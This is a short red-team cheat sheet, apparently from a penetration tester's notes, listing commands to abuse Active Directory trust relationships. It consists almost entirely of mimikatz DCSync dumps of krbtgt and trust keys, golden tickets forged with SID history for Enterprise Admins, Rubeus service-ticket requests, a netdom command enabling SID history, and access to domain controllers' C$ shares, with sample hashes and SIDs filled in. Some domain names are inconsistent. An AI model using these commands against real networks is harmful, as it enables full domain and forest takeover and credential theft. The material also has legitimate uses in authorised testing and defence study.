Active Directory Forest
Bidirectional Trust Within a Forest
mimikatz.exe
lsadump::dcsync /domain:ops.comply.com /user:ops\krbtgt
Get-DomainSID -Domain ops.red.com
Get-DomainSID -Domain red.com
mimikatz.exe "kerberos::golden /user:Administrator /domain:ops.red.com /sid:S-1-5-21-2032401531-514583578-4118054891 /krbtgt:7c7865e6e30e54e8845aad091b0ff447 /sids:S-1-5-21-1135011135-3178090508-3151492220-519 /ptt" "exit"
Abuse Trust key in bidirectional trust
lsadump::dcsync /domain:child.red.com /user:red$
mimikatz kerberos::golden /user:Administrator /domain:child.red.com /sid:S-1-5-21-1675743924-53933031-1918224021 /rc4:51d5b5713a4732047319d02bb9c07c10 /sids:S-1-5-21-3192643952-2658629199-322554960-519 /service:krbtgt /target:red.com /ticket:trust.kirbi
rubeus.exe asktgs /ticket:trust.kirbi /service:cifs/reddc.red.com /dc:reddc.red.com /ptt
ls \\reddc.red.com\c$
Inbound Trust
dcsync red.com red\administrator
rubeus.exe asktgt /user:administrator /domain:red.com /aes256:b3d86eabd4895b6cc1ba459490445e0444053c7f24e0ed50cf86d1e1154576c9 /opsec /nowrap
rubeus.exe asktgs /service:krbtgt/blue.com /domain:red.com /dc:reddc.red.com /ticket:[ticket] /nowrap
rubeus.exe asktgs /service:cifs/bluedc.blue.com /domain:bluedc.blue.com /dc:bluedc.blue.com /ticket:[ticket] /nowrap
echo '[ticket]' | base64 -d > red.kirbi
ls \\bluedc.blue.com\c$
Bidirectional Trust Between Forests
mimikatz.exe
lsadump::dcsync /domain:red.com /user:RED\krbtgt
Get-DomainSID -Domain red.com
Get-DomainSID -Domain redteam.com
netdom trust redteam.com /d:red.com /enablesidhistory:yes
Get-DomainGroupMember -Identity "Administrators" -Domain redteam.com
mimikatz.exe "kerberos::golden /user:Administrator /domain:redteam.com /sid:S-1-5-21-2032401531-514583578-4118054891 /krbtgt:7c7865e6e30e54e8845aad091b0ff447 /sids:S-1-5-21-1135011135-3178090508-3151492220-1106 /ptt" "exit"